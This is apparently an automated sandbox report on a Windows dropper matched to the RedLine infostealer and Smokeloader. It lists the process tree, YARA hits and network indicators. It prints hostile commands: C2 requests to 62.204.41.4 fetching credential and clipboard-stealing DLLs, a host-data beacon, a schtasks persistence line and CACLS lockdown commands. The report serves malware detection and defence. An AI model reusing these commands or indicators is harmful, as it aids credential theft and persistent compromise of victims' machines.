00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

IP Address: 62.204.41.4 62.204.41.4

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01367F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

11_2_01367F00

Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4

Source: unknown

HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1

Source: xriv.exe, 0000000B.00000002.318710664.000000000165A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB3BA2	0_2_00EB3BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB5C9E	0_2_00EB5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00943BA2	1_2_00943BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00945C9E	1_2_00945C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066786D	2_2_0066786D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006618B7	2_2_006618B7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006789EF	2_2_006789EF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006631F0	2_2_006631F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00663187	2_2_00663187
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00662B17	2_2_00662B17
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006784AB	2_2_006784AB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00662DF7	2_2_00662DF7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066DE78	2_2_0066DE78
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00668EC7	2_2_00668EC7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00667EA6	2_2_00667EA6
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067A725	2_2_0067A725
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00678F33	2_2_00678F33
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00666F07	2_2_00666F07
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006677D9	2_2_006677D9
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00857000	2_2_00857000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01388530	11_2_01388530
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0138754D	11_2_0138754D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01366F40	11_2_01366F40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		0_2_00EB1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		1_2_00941F90

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 01375E20 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 01377CE0 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: String function: 0066E43F appears 44 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression
Source: bfCg.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189540 bytes, 2 files, at 0x2c +A "afCf.exe" +A "nika.exe", ID 1523, number 1, 9 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/14@0/1

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_00EB3FEF

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 6_2_00007FFC9D7D1A1D ControlService,ChangeServiceConfigA,

6_2_00007FFC9D7D1A1D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00EB4FE0

Source: file.exe	ReversingLabs: Detection: 66%
Source: file.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		0_2_00EB1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		1_2_00941F90

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00EB597D

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01

Source: C:\Users\user\Desktop\file.exe	Command line argument: Kernel32.dll	0_2_00EB2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Command line argument: Kernel32.dll	1_2_00942BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Command line argument: 08A	2_2_00413780

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
